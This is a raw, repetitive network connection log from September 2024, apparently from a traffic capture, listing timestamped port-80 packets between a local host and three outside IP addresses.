Sep 27, 2024 04:21:15.437911034 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.437911987 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.437930107 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.437939882 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.437989950 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.455511093 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.455542088 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.455553055 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.455579996 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.455607891 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.455630064 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.455647945 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.455660105 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.455672026 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.455674887 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.455698967 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.455707073 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.455714941 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.455725908 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.455732107 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.455765963 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.467818022 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.467828035 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.467839003 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.467852116 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.467864990 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.467875957 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.467885971 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.467894077 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.467921972 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.467930079 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.467952013 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.467963934 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.467995882 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.468147039 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.468172073 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.468182087 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.468199015 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.468224049 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.468241930 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.468254089 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.468265057 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.468275070 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.468287945 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.468306065 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.468332052 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.468360901 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.468372107 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.468384981 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.468410015 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.468432903 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.468645096 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.468660116 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.468672037 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.468698978 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.468712091 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.468724012 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.468724966 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.468739986 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.468750954 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.468760967 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.468769073 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.468790054 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.468807936 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.468816996 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.468828917 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.468856096 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.468873978 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.469012976 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.469055891 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.469063044 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.469067097 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.469091892 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.469109058 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.469145060 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.469156981 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.469167948 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.469178915 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.469187975 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.469204903 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.469213009 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.469223976 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.469229937 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.469234943 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.469266891 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.469460011 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.469496012 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.469504118 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.469508886 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.469538927 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.469573975 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.469585896 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.469597101 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.469619036 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.469633102 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.469708920 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.469721079 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.469729900 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.469741106 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.469752073 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.469763994 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.469767094 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.469793081 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.469805002 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.469927073 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.469938040 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.469948053 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.469958067 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.469969034 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.469978094 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.469980955 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.469994068 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.470005035 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.470155954 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.470155954 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.470155954 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.470499992 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.470511913 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.470523119 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.470582962 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.470582962 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.470604897 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.470618010 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.470629930 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.470640898 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.470663071 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.470688105 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.470706940 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.470717907 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.470727921 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.470738888 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.470751047 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.470763922 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.470799923 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.470799923 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.470913887 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.470923901 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.470933914 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.470946074 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.470958948 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.470972061 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.470971107 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.470983982 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.470993996 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.470998049 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.471019983 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.471051931 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.471415997 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.471460104 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.471471071 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.471482038 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.471515894 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.471515894 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.471519947 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.471533060 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.471565008 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.471596956 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.485954046 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.486021042 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.486062050 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.486062050 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.512022972 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:15.512056112 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:15.512109041 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:15.512109041 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:15.513345003 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:15.516045094 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.516062975 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.516073942 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.516100883 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.516114950 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.516117096 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.516129017 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.516155005 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.516164064 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.516175032 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.516184092 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.516197920 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.516210079 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.516232967 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.516232967 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.516232967 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.516252995 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.516262054 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.516300917 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.516323090 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.516335964 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.516346931 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.516364098 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.516387939 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.516388893 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.516431093 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.516455889 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.516501904 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.518160105 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:15.518385887 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.518518925 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.518542051 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.518564939 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.518564939 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.518579006 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.518614054 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.518618107 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.518629074 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.518631935 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.518651962 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.518665075 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.518680096 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.518680096 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.518680096 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.518704891 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.518718958 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.518745899 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.518745899 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.518759966 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.518923044 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.518939018 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.518956900 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.518969059 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.518976927 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.518976927 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.518980980 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.519000053 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.519126892 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.519273996 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.519284010 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.519294977 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.519319057 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.519350052 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.519361973 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.519371986 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.519395113 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.519395113 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.519401073 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.519412994 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.519431114 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.519443989 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.519460917 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.519460917 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.519484043 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.520055056 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.520080090 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.520091057 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.520121098 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.520121098 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.520174026 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.520184994 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.520201921 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.520206928 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.520215034 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.520221949 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.520241022 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.520283937 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.520672083 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.520684004 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.520694017 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.520724058 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.520744085 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.520755053 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.520766973 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.520778894 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.520790100 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.520813942 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.520813942 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.520823956 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.520834923 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.520849943 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.520863056 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.520863056 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.520896912 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.520896912 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.521620035 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.521631002 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.521642923 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.521682978 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.521729946 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.528557062 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.528587103 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.528603077 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.528640032 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.528672934 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.528686047 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.528697014 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.528708935 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.528721094 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.528737068 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.528774023 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.528774023 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.546684980 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.546696901 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.546719074 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.546730995 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.546742916 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.546775103 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.546787024 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.546783924 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.546807051 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.546916962 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.546916962 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.546916962 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.570703030 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.570761919 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.570772886 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.570780039 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.570817947 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.570861101 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.570873022 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.570883989 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.570894957 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.570910931 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.570919991 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.570921898 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.570933104 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.570954084 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.570954084 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.570967913 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.570980072 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.570983887 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.571027994 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.571163893 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.571188927 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.571207047 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.571237087 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.571810007 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.571849108 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.571861029 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.571873903 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.571886063 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.571888924 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.571922064 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.571952105 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.572031021 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.572043896 CEST	80	49724	176.113.115.95	192.168.2.5
